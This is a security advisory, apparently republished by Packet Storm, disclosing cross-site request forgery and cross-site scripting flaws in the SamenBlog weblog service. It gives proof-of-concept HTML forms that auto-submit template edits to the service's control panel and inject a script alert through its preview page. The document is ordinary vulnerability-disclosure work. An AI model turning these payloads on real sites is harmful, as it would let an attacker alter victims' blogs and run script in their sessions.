SamenBlog Weblog Service suffers from cross site request forgery and cross site scripting vulnerabilities.
68b5084457f76fb3532f45c3afce9726fa50bde054a8ae2bf5a8047cfa6d3a81Document Title:
===============
SamenBlog Weblog Service - Cross Site Request Forgery / Cross Site Scripting
References (Source):
====================
http://ehsansec.ir/advisories/samenblog-xsrf-xss.txt
Release Date:
=============
2016-02-20
Product & Service Introduction:
===============================
Samenblog allows its users to publish their information, memories,
essays, etc to experience and enjoy a professional weblog-publishing
system in a basic environment and also it has tried to provide a
system for both professional and amateur users.
Vulnerability Type:
=========================
Cross Site Request Forgery
Cross Site Scripting
Vulnerability Details:
==============================
I discovered a client-side cross site request forgery web
vulnerability and a cross site scripting vulnerability in
Samenblog.com (Weblog Service).
Author:
=================
Ehsan Hosseini
http://ehsansec.ir/
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Proof of Concept (PoC):
=======================
-- Cross Site Request Forgery --
-- PoC : Edit Themes --
-- PoC 1 --
<html>
<head>
<title>Edit Weblog Template - Csrf</title>
</head>
<body onload="document.info.submit()">
<form action='http://samenblog.com/cpanel/edit_template.php'
method='POST' name='info'>
<input type="hidden" name="template" value="<h1> PoC </h1>">
<input type='hidden' name='task' value='doedit'>
</form>
</body>
-- PoC 2 --
<html>
<head>
<title>Edit The extra pages templates - Csrf</title>
</head>
<body onload="document.info.submit()">
<form action='http://samenblog.com/cpanel/edit_template.php'
method='POST' name='infoo'>
<input name='templatepage' value="<h1> PoC </h1>">
<input type='hidden' name='task' value='doeditpage'>
</form>
</body>
</html>
-- PoC 3 --
<html>
<head>
<title>Edit The archive templates - Csrf</title>
</head>
<body onload="document.info.submit()">
<form action='http://samenblog.com/cpanel/edit_template.php'
method='POST' name='infooo'>
<input name='templatearchive' value="<h1> PoC </h1>">
<input type='hidden' name='task' value='doeditarchive'>
</form>
</body>
</html>
-- Cross Site Scripting --
<html>
<head>
<title>Cross Site Scripting</title>
</head>
<body onload="document.info.submit()">
<form action='http://samenblog.com/cpanel/preview.php' method='POST'
name='preview'>
<input name='templatearchive' value="<script>alert('Ehsan')</script>">
</form>
</body>
</html>
Author:
==================
Ehsan Hosseini
http://ehsansec.ir/
Contact:
========
hehsan979@gmail.com
info@ehsansec.ir
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed